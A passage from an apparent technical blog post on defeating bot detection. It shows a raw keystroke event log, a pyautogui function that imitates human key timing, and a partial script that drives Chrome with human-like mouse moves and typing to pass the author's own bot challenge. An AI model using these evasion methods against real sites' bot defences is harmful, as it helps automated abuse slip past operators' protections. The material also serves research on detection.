class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">10005.665</span><span class="p">],[</span><span class="s2">"kd"</span><span class="p">,</span><span class="s2">"KeyM"</span><span class="p">,</span><span class="s2">"M"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0100"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">10005.915</span><span class="p">],[</span><span class="s2">"kd"</span><span class="p">,</span><span class="s2">"KeyM"</span><span class="p">,</span><span class="s2">"M"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0100"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">10025.13</span><span class="p">],[</span><span class="s2">"kd"</span><span class="p">,</span><span class="s2">"KeyM"</span><span class="p">,</span><span class="s2">"M"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0100"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">10025.61</span><span class="p">],[</span><span class="s2">"ku"</span><span class="p">,</span><span class="s2">"ShiftLeft"</span><span class="p">,</span><span class="s2">"Shift"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">10037.575</span><span class="p">],[</span><span class="s2">"ku"</span><span class="p">,</span><span class="s2">"ShiftLeft"</span><span class="p">,</span><span class="s2">"Shift"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">10037.85</span><span class="p">],[</span><span class="s2">"ku"</span><span class="p">,</span><span class="s2">"ShiftLeft"</span><span class="p">,</span><span class="s2">"Shift"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">10038.865</span><span class="p">],[</span><span class="s2">"ku"</span><span class="p">,</span><span class="s2">"ShiftLeft"</span><span class="p">,</span><span class="s2">"Shift"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">10039.455</span><span class="p">],[</span><span class="s2">"ku"</span><span class="p">,</span><span class="s2">"KeyM"</span><span class="p">,</span><span class="s2">"m"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">10141.195</span><span class="p">],[</span><span class="s2">"ku"</span><span class="p">,</span><span class="s2">"KeyM"</span><span class="p">,</span><span class="s2">"m"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">10141.51</span><span class="p">],[</span><span class="s2">"ku"</span><span class="p">,</span><span class="s2">"KeyM"</span><span class="p">,</span><span class="s2">"m"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">10142.325</span><span class="p">],[</span><span class="s2">"ku"</span><span class="p">,</span><span class="s2">"KeyM"</span><span class="p">,</span><span class="s2">"m"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">10142.79</span><span class="p">],[</span><span class="s2">"kd"</span><span class="p">,</span><span class="s2">"KeyA"</span><span class="p">,</span><span class="s2">"a"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">10163.5</span><span class="p">],[</span><span class="s2">"kd"</span><span class="p">,</span><span class="s2">"KeyA"</span><span class="p">,</span><span class="s2">"a"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">10164.015</span><span class="p">],[</span><span class="s2">"kd"</span><span class="p">,</span><span class="s2">"KeyA"</span><span class="p">,</span><span class="s2">"a"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">10164.405</span><span class="p">],[</span><span class="s2">"kd"</span><span class="p">,</span><span class="s2">"KeyA"</span><span class="p">,</span><span class="s2">"a"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">10164.775</span><span class="p">],[</span><span class="s2">"kd"</span><span class="p">,</span><span class="s2">"KeyT"</span><span class="p">,</span><span class="s2">"t"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">10229.145</span><span class="p">],[</span><span class="s2">"kd"</span><span class="p">,</span><span class="s2">"KeyT"</span><span class="p">,</span><span class="s2">"t"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">10229.375</span><span class="p">],[</span><span class="s2">"kd"</span><span class="p">,</span><span class="s2">"KeyT"</span><span class="p">,</span><span class="s2">"t"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">10229.85</span><span class="p">],[</span><span class="s2">"kd"</span><span class="p">,</span><span class="s2">"KeyT"</span><span class="p">,</span><span class="s2">"t"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">10230.11</span><span class="p">],[</span><span class="s2">"ku"</span><span class="p">,</span><span class="s2">"KeyA"</span><span class="p">,</span><span class="s2">"a"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">10284.885</span><span class="p">],[</span><span class="s2">"ku"</span><span class="p">,</span><span class="s2">"KeyA"</span><span class="p">,</span><span class="s2">"a"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">10285.08</span><span class="p">],[</span><span class="s2">"ku"</span><span class="p">,</span><span class="s2">"KeyA"</span><span class="p">,</span><span class="s2">"a"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">10304.3</span><span class="p">],[</span><span class="s2">"ku"</span><span class="p">,</span><span class="s2">"KeyA"</span><span class="p">,</span><span class="s2">"a"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">10304.72</span><span class="p">],[</span><span class="s2">"kd"</span><span class="p">,</span><span class="s2">"KeyH"</span><span class="p">,</span><span class="s2">"h"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">10326.93</span><span class="p">],[</span><span class="s2">"kd"</span><span class="p">,</span><span class="s2">"KeyH"</span><span class="p">,</span><span class="s2">"h"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">10327.25</span><span class="p">],[</span><span class="s2">"kd"</span><span class="p">,</span><span class="s2">"KeyH"</span><span class="p">,</span><span class="s2">"h"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">10327.81</span><span class="p">],[</span><span class="s2">"kd"</span><span class="p">,</span><span class="s2">"KeyH"</span><span class="p">,</span><span class="s2">"h"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">10328.205</span><span class="p">],[</span><span class="s2">"ku"</span><span class="p">,</span><span class="s2">"KeyT"</span><span class="p">,</span><span class="s2">"t"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">10360.765</span><span class="p">],[</span><span class="s2">"ku"</span><span class="p">,</span><span class="s2">"KeyT"</span><span class="p">,</span><span class="s2">"t"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">10360.96</span><span class="p">],[</span><span class="s2">"ku"</span><span class="p">,</span><span class="s2">"KeyT"</span><span class="p">,</span><span class="s2">"t"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">10361.375</span><span class="p">],[</span><span class="s2">"ku"</span><span class="p">,</span><span class="s2">"KeyT"</span><span class="p">,</span><span class="s2">"t"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">10361.625</span><span class="p">],[</span><span class="s2">"ku"</span><span class="p">,</span><span class="s2">"KeyH"</span><span class="p">,</span><span class="s2">"h"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">10421.27</span><span class="p">],[</span><span class="s2">"ku"</span><span class="p">,</span><span class="s2">"KeyH"</span><span class="p">,</span><span class="s2">"h"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">10421.605</span><span class="p">],[</span><span class="s2">"ku"</span><span class="p">,</span><span class="s2">"KeyH"</span><span class="p">,</span><span class="s2">"h"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">10422.53</span><span class="p">],[</span><span class="s2">"ku"</span><span class="p">,</span><span class="s2">"KeyH"</span><span class="p">,</span><span class="s2">"h"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">10422.865</span><span class="p">],[</span><span class="s2">"kd"</span><span class="p">,</span><span class="s2">"KeyM"</span><span class="p">,</span><span class="s2">"m"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">10597.02</span><span class="p">],[</span><span class="s2">"kd"</span><span class="p">,</span><span class="s2">"KeyM"</span><span class="p">,</span><span class="s2">"m"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">10597.255</span><span class="p">],[</span><span class="s2">"kd"</span><span class="p">,</span><span class="s2">"KeyM"</span><span class="p">,</span><span class="s2">"m"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">10597.755</span><span class="p">],[</span><span class="s2">"kd"</span><span class="p">,</span><span class="s2">"KeyM"</span><span class="p">,</span><span class="s2">"m"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">10598.025</span><span class="p">],[</span><span class="s2">"ku"</span><span class="p">,</span><span class="s2">"KeyM"</span><span class="p">,</span><span class="s2">"m"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">10717.02</span><span class="p">],[</span><span class="s2">"ku"</span><span class="p">,</span><span class="s2">"KeyM"</span><span class="p">,</span><span class="s2">"m"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">10717.26</span><span class="p">],[</span><span class="s2">"ku"</span><span class="p">,</span><span class="s2">"KeyM"</span><span class="p">,</span><span class="s2">"m"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">10740.125</span><span class="p">],[</span><span class="s2">"ku"</span><span class="p">,</span><span class="s2">"KeyM"</span><span class="p">,</span><span class="s2">"m"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">10740.54</span><span class="p">],[</span><span class="s2">"kd"</span><span class="p">,</span><span class="s2">"KeyE"</span><span class="p">,</span><span class="s2">"e"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">10741.085</span><span class="p">],[</span><span class="s2">"kd"</span><span class="p">,</span><span class="s2">"KeyE"</span><span class="p">,</span><span class="s2">"e"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">10741.71</span><span class="p">],[</span><span class="s2">"kd"</span><span class="p">,</span><span class="s2">"KeyE"</span><span class="p">,</span><span class="s2">"e"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">10742.335</span><span class="p">],[</span><span class="s2">"kd"</span><span class="p">,</span><span class="s2">"KeyE"</span><span class="p">,</span><span class="s2">"e"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">10742.94</span><span class="p">],[</span><span class="s2">"ku"</span><span class="p">,</span><span class="s2">"KeyE"</span><span class="p">,</span><span class="s2">"e"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">10852.88</span><span class="p">],[</span><span class="s2">"ku"</span><span class="p">,</span><span class="s2">"KeyE"</span><span class="p">,</span><span class="s2">"e"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">10853.11</span><span class="p">],[</span><span class="s2">"ku"</span><span class="p">,</span><span class="s2">"KeyE"</span><span class="p">,</span><span class="s2">"e"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">10853.7</span><span class="p">],[</span><span class="s2">"ku"</span><span class="p">,</span><span class="s2">"KeyE"</span><span class="p">,</span><span class="s2">"e"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">10854.45</span><span class="p">]]</span>
</code></pre></div>
<p>A lot of data, but it's possible to observe many very interesting things in real human typing behvaior.</p>
<p>How would I implement a straightforward human like typing function?</p>
<div class="highlight"><pre><span></span><code><span class="kn">import</span> <span class="nn">pyautogui</span>
<span class="kn">import</span> <span class="nn">random</span>
<span class="kn">import</span> <span class="nn">time</span>
<span class="k">def</span> <span class="nf">tinySleep</span><span class="p">():</span>
<span class="n">time</span><span class="o">.</span><span class="n">sleep</span><span class="p">(</span><span class="n">random</span><span class="o">.</span><span class="n">uniform</span><span class="p">(</span><span class="mf">0.005</span><span class="p">,</span> <span class="mf">0.07</span><span class="p">))</span>
<span class="k">def</span> <span class="nf">doubleHit</span><span class="p">(</span><span class="n">key1</span><span class="p">,</span> <span class="n">key2</span><span class="p">):</span>
<span class="sd">"""</span>
<span class="sd"> Sometimes press two keys down at the same time and randomize the </span>
<span class="sd"> order of the corresponding key up events to resemble </span>
<span class="sd"> human typign closer.</span>
<span class="sd"> """</span>
<span class="n">pyautogui</span><span class="o">.</span><span class="n">keyDown</span><span class="p">(</span><span class="n">key1</span><span class="p">)</span>
<span class="n">tinySleep</span><span class="p">()</span>
<span class="n">pyautogui</span><span class="o">.</span><span class="n">keyDown</span><span class="p">(</span><span class="n">key2</span><span class="p">)</span>
<span class="n">tinySleep</span><span class="p">()</span>
<span class="k">if</span> <span class="n">random</span><span class="o">.</span><span class="n">random</span><span class="p">()</span> <span class="o">></span> <span class="mf">0.5</span><span class="p">:</span>
<span class="n">pyautogui</span><span class="o">.</span><span class="n">keyUp</span><span class="p">(</span><span class="n">key1</span><span class="p">)</span>
<span class="n">tinySleep</span><span class="p">()</span>
<span class="n">pyautogui</span><span class="o">.</span><span class="n">keyUp</span><span class="p">(</span><span class="n">key2</span><span class="p">)</span>
<span class="k">else</span><span class="p">:</span>
<span class="n">pyautogui</span><span class="o">.</span><span class="n">keyUp</span><span class="p">(</span><span class="n">key2</span><span class="p">)</span>
<span class="n">tinySleep</span><span class="p">()</span>
<span class="n">pyautogui</span><span class="o">.</span><span class="n">keyUp</span><span class="p">(</span><span class="n">key1</span><span class="p">)</span>
<span class="k">def</span> <span class="nf">humanTyping</span><span class="p">(</span><span class="n">text</span><span class="p">,</span> <span class="n">speed</span><span class="o">=</span><span class="p">(</span><span class="mf">0.015</span><span class="p">,</span> <span class="mf">0.1</span><span class="p">)):</span>
<span class="sd">"""</span>
<span class="sd"> Mostly the keydown/keyup pairs are in order, but</span>
<span class="sd"> sometimes we want two keydown's at the same time.</span>
<span class="sd"> text: the text to be written in a human fashion.</span>
<span class="sd"> speed: the gap between key presses in seconds. Random number between</span>
<span class="sd"> (low, high)</span>
<span class="sd"> """</span>
<span class="n">i</span> <span class="o">=</span> <span class="mi">0</span>
<span class="k">while</span> <span class="n">i</span> <span class="o"><=</span> <span class="nb">len</span><span class="p">(</span><span class="n">text</span><span class="p">):</span>
<span class="n">time</span><span class="o">.</span><span class="n">sleep</span><span class="p">(</span><span class="n">random</span><span class="o">.</span><span class="n">uniform</span><span class="p">(</span><span class="o">*</span><span class="n">speed</span><span class="p">))</span>
<span class="k">if</span> <span class="n">random</span><span class="o">.</span><span class="n">random</span><span class="p">()</span> <span class="o"><</span> <span class="mf">.3</span> <span class="ow">and</span> <span class="n">i</span><span class="o">+</span><span class="mi">1</span> <span class="o"><</span> <span class="nb">len</span><span class="p">(</span><span class="n">text</span><span class="p">):</span>
<span class="n">doubleHit</span><span class="p">(</span><span class="n">text</span><span class="p">[</span><span class="n">i</span><span class="p">],</span> <span class="n">text</span><span class="p">[</span><span class="n">i</span><span class="o">+</span><span class="mi">1</span><span class="p">])</span>
<span class="n">i</span> <span class="o">+=</span> <span class="mi">2</span>
<span class="k">else</span><span class="p">:</span>
<span class="n">pyautogui</span><span class="o">.</span><span class="n">keyDown</span><span class="p">(</span><span class="n">text</span><span class="p">[</span><span class="n">i</span><span class="p">])</span>
<span class="n">tinySleep</span><span class="p">()</span>
<span class="n">pyautogui</span><span class="o">.</span><span class="n">keyUp</span><span class="p">(</span><span class="n">text</span><span class="p">[</span><span class="n">i</span><span class="p">])</span>
<span class="n">i</span> <span class="o">+=</span> <span class="mi">1</span>
<span class="k">if</span> <span class="n">i</span> <span class="o">>=</span> <span class="nb">len</span><span class="p">(</span><span class="n">text</span><span class="p">):</span>
<span class="k">break</span>
<span class="n">humanTyping</span><span class="p">(</span><span class="s2">"this is a test"</span><span class="p">)</span>
</code></pre></div>
<p>The most important observation: Often bots have a perfect sequence of <code>keydown X</code>, <code>keyup X</code>, <code>keydown Y</code>, <code>keyup Y</code> events, whereas humans press keys interleaved: <code>keydown X</code>, <code>keydown Y</code>, <code>keyup Y</code>, <code>keyup X</code>. Only the <code>keydown</code> events must be in order, not the <code>keyup</code> counterparts!</p>
<p>Of course the above algorithm is very bad and easily detectable. A real human key typing simulation involves collecting huge samples of real human typing behavior and then replaying them such that the four temporal delaying features resemble a real human being.</p>
<p>There are many biometric features to be found in the temporal aspects of human typing. Some examples:</p>
<ul>
<li>Humans often have to correct spelling mistakes in their texts by using the backspace key or the mouse to select text to be edited. Bot's don't do that.</li>
<li>When two identical keys are pressed such as in <em>coffee</em>, then the first <em>f</em> and first <em>e</em> take longer time to type compared to the second character.</li>
<li>The tyiping speed within words is faster than between words </li>
<li>There is a cognitive break between sentences, paragraphs, chapters, ...</li>
<li>Complicated words are more frequently re-written than easy words </li>
</ul>
<h2>Full Example Step by Step</h2>
<p>Now we have all parts ready to create a full example. I will show the code for a small example how to solve the bot challenge that can be found here: <a href="https://bot.incolumitas.com/#botChallenge">https://bot.incolumitas.com/#botChallenge</a>.</p>
<p>The most recent example code can be found <a href="https://github.com/NikolaiT/stealthy-scraping-tools/blob/main/example.py">here</a>.</p>
<p>Run it with:</p>
<div class="highlight"><pre><span></span><code>pipenv shell
</code></pre></div>
<p>And then run:</p>
<div class="highlight"><pre><span></span><code><span class="n">python</span> <span class="n">example</span><span class="o">.</span><span class="n">py</span>
</code></pre></div>
<p>Below is the full Python source code. Please keep in mind that I most likely will
not keep this blog post updated, consult the GitHub repository instead!</p>
<div class="highlight"><pre><span></span><code><span class="kn">import</span> <span class="nn">time</span>
<span class="kn">import</span> <span class="nn">os</span>
<span class="kn">import</span> <span class="nn">random</span>
<span class="kn">import</span> <span class="nn">json</span>
<span class="kn">import</span> <span class="nn">subprocess</span>
<span class="kn">from</span> <span class="nn">mouse</span> <span class="kn">import</span> <span class="n">humanMove</span>
<span class="kn">from</span> <span class="nn">typing</span> <span class="kn">import</span> <span class="n">humanTyping</span>
<span class="sd">"""</span>
<span class="sd">You might have to adjust some coordinates. </span>
<span class="sd">I used a dual screen setup and I started the browser on the</span>
<span class="sd">left screen.</span>
<span class="sd">You can obtain the coordinates of your current mouse pointer with </span>
<span class="sd">the bash command on Linux `xdotool getmouselocation`</span>
<span class="sd">"""</span>
<span class="k">def</span> <span class="nf">getPageSource</span><span class="p">():</span>
<span class="n">cmd</span> <span class="o">=</span> <span class="sa">f</span><span class="s1">'/usr/bin/node page_source.js'</span>
<span class="n">ps</span> <span class="o">=</span> <span class="n">subprocess</span><span class="o">.</span><span class="n">check_output</span><span class="p">(</span><span class="n">cmd</span><span class="p">,</span> <span class="n">shell</span><span class="o">=</span><span class="kc">True</span><span class="p">)</span>
<span class="k">return</span> <span class="n">ps</span>
<span class="k">def</span> <span class="nf">getCoords</span><span class="p">(</span><span class="n">selector</span><span class="p">,</span> <span class="n">randomize_within_bcr</span><span class="o">=</span><span class="kc">True</span><span class="p">):</span>
<span class="sd">"""</span>
<span class="sd"> Example: `node coords.js "li:nth-of-type(3) a"`</span>
<span class="sd"> """</span>
<span class="n">cmd</span> <span class="o">=</span> <span class="sa">f</span><span class="s1">'/usr/bin/node coords.js "</span><span class="si">{</span><span class="n">selector</span><span class="si">}</span><span class="s1">"'</span>
<span class="n">coords</span> <span class="o">=</span> <span class="n">subprocess</span><span class="o">.</span><span class="n">check_output</span><span class="p">(</span><span class="n">cmd</span><span class="p">,</span> <span class="n">shell</span><span class="o">=</span><span class="kc">True</span><span class="p">)</span>
<span class="n">parsed</span> <span class="o">=</span> <span class="n">json</span><span class="o">.</span><span class="n">loads</span><span class="p">(</span><span class="n">coords</span><span class="p">)</span>
<span class="n">x</span> <span class="o">=</span> <span class="n">parsed</span><span class="p">[</span><span class="s1">'x'</span><span class="p">]</span>
<span class="n">y</span> <span class="o">=</span> <span class="n">parsed</span><span class="p">[</span><span class="s1">'y'</span><span class="p">]</span>
<span class="k">if</span> <span class="n">randomize_within_bcr</span><span class="p">:</span>
<span class="n">x</span> <span class="o">+=</span> <span class="n">random</span><span class="o">.</span><span class="n">randrange</span><span class="p">(</span><span class="mi">0</span><span class="p">,</span> <span class="nb">int</span><span class="p">(</span><span class="n">parsed</span><span class="p">[</span><span class="s1">'width'</span><span class="p">]))</span>
<span class="n">y</span> <span class="o">+=</span> <span class="n">random</span><span class="o">.</span><span class="n">randrange</span><span class="p">(</span><span class="mi">0</span><span class="p">,</span> <span class="nb">int</span><span class="p">(</span><span class="n">parsed</span><span class="p">[</span><span class="s1">'height'</span><span class="p">]))</span>
<span class="k">return</span> <span class="n">x</span><span class="p">,</span> <span class="n">y</span>
<span class="k">def</span> <span class="nf">startBrowser</span><span class="p">():</span>
<span class="n">os</span><span class="o">.</span><span class="n">system</span><span class="p">(</span><span class="s1">'google-chrome --remote-debugging-port=9222 --start-maximized --disable-notifications &'</span><span class="p">)</span>
<span class="n">time</span><span class="o">.</span><span class="n">sleep</span><span class="p">(</span><span class="mi">4</span><span class="p">)</span>
<span class="c1"># visit https://bot.incolumitas.com/#botChallenge</span>
<span class="n">humanMove</span><span class="p">(</span><span class="mi">168</span><span class="p">,</span> <span class="mi">79</span><span class="p">)</span>
<span class="n">time</span><span class="o">.</span><span class="n">sleep</span><span class="p">(</span><span class="n">random</span><span class="o">.</span><span class="n">uniform</span><span class="p">(</span><span class="mf">0.5</span><span class="p">,</span> <span class="mf">1.5</span><span class="p">))</span>
<span class="n">humanTyping</span><span class="p">(</span><span class="s1">'bot.incolumitas.com</span><span class="se">\n</span><span class="s1">'</span><span class="p">,</span> <span class="n">speed</span><span class="o">=</span><span class="p">(</span><span class="mf">0.005</span><span class="p">,</span> <span class="mf">0.008</span><span class="p">))</span>
<span class="n">time</span><span class="o">.</span><span class="n">sleep</span><span class="p">(</span><span class="n">random</span><span class="o">.</span><span class="n">uniform</span><span class="p">(</span><span class="mf">1.5</span><span class="p">,</span> <span class="mf">2.5</span><span class="p">))</span>
<span class="k">def</span> <span class="nf">main</span><span class="p">():</span>
<span class="n">startBrowser</span><span class="p">()</span>
<span class="c1"># click link to get to the challenge</span>
<span class="n">coords</span> <span class="o">=</span> <span class="n">getCoords</span><span class="p">(</span><span class="s1">'li:nth-of-type(3) a'</span><span class="p">)</span>
<span class="nb">print</span><span class="p">(</span><span class="s1">'Clicking on coordinates '</span> <span class="o">+</span> <span class="nb">str</span><span class="p">(</span><span class="n">coords</span><span class="p">))</span>
<span class="n">humanMove</span><span class="p">(</span><span class="o">*</span><span class="n">coords</span><span class="p">)</span>
<span class="n">time</span><span class="o">.</span><span class="n">sleep</span><span class="p">(</span><span class="n">random</span><span class="o">.</span><span class="n">uniform</span><span class="p">(</span><span class="mf">0.5</span><span class="p">,</span> <span class="mf">1.0</span><span class="p">))</span>
<span class="c1"># enter username</span>
<span class="n">username</span> <span class="o">=</span> <span class="n">getCoords</span><span class="p">(</span><span class="s1">'input[name="userName"]'</span><span class="p">)</span>
<span class="n">humanMove</span><span class="p">(</span><span class="o">*</span><span class="n">username</span><span class="p">,</span> <span class="n">clicks</span><span class="o">=</span><span class="mi">2</span><span class="p">)</span>
<span class="n">time</span><span class="o">.</span><span class="n">sleep</span><span class="p">(</span><span class="n">random</span><span class="o">.</span><span class="n">uniform</span><span class="p">(</span><span class="mf">0.25</span><span class="p">,</span> <span class="mf">1.25</span><span class="p">))</span>
<span class="n">humanTyping</span><span class="p">(</span><span class="s1">'IamNotABotISwear</span><span class="se">\n</span><span class="s1">'</span><span class="p">,</span> <span class="n">speed</span><span class="o">=</span><span class="p">(</span><span class="mf">0.005</span><span class="p">,</span> <span class="mf">0.008</span><span class="p">))</span>
<span class="n">time</span><span class="o">.</span><span class="n">sleep</span><span class="p">(</span><span class="n">random</span><span class="o">.</span><span class="n">uniform</span><span class="p">(</span><span class="mf">0.5</span><span class="p">,</span> <span class="mf">1.0</span><span class="p">))</span>
<span class="c1"># enter email</span>
